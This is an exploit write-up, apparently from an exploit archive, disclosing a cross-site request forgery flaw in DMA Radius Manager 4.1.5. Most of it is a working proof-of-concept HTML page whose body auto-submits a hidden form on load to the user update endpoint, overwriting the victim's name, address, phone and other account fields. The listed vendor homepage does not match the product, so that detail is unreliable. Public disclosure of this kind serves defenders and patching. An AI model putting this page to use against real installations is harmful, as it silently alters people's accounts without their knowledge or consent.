DMA Radius Manager 4.1.5 Cross Site Request Forgery

`<!--  
# Exploit Title: DMA Radius Manager <= 4.1.5 CSRF (Edit Account)  
# Exploit Author: bl4ck_mohajem  
# Vendor Homepage: http://yonacms.com  
# Version: 4.1.5  
  
  
# Overview  
DMA Radius Manager is a easy to use administration system for  
Mikrotik, Cisco, StarOS, Chillispot, DD-WRT, pfSense NAS devices and  
DOCSIS CMTS. It provides centralized authentication, accounting and  
billing functions.  
  
CSRF PoC Code  
=============  
-->  
<html>  
<body onload="document.csrf.submit()">  
<form name="csrf"  
action="http://127.0.0.1/user.php?cont=update_user" method="post">  
<input name="firstname" type="hidden" value="Name">  
<input name="lastname" type="hidden" value="Family">  
<input name="address" type="hidden" value="IRan">  
<input name="city" type="hidden" value="IRAN">  
<input name="zip" type="hidden" value="010101">  
<input name="country" type="hidden" value="Albania">  
<input name="state" type="hidden" value="Alabama">  
<input name="phone" type="hidden" value="00000000">  
<input name="mobile" type="hidden" value="000000000">  
<input name="email" type="hidden" value="">  
<input name="company" type="hidden" value="">  
<input name="taxid" type="hidden" value="">  
<input name="lang" type="hidden" value="English">  
<input name="alertsms" type="hidden" value="1">  
</form>  
</body>  
</html>  
<!--  
  
-->  
  
  
######################################################  
#  
#tanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky  
############################################################  
`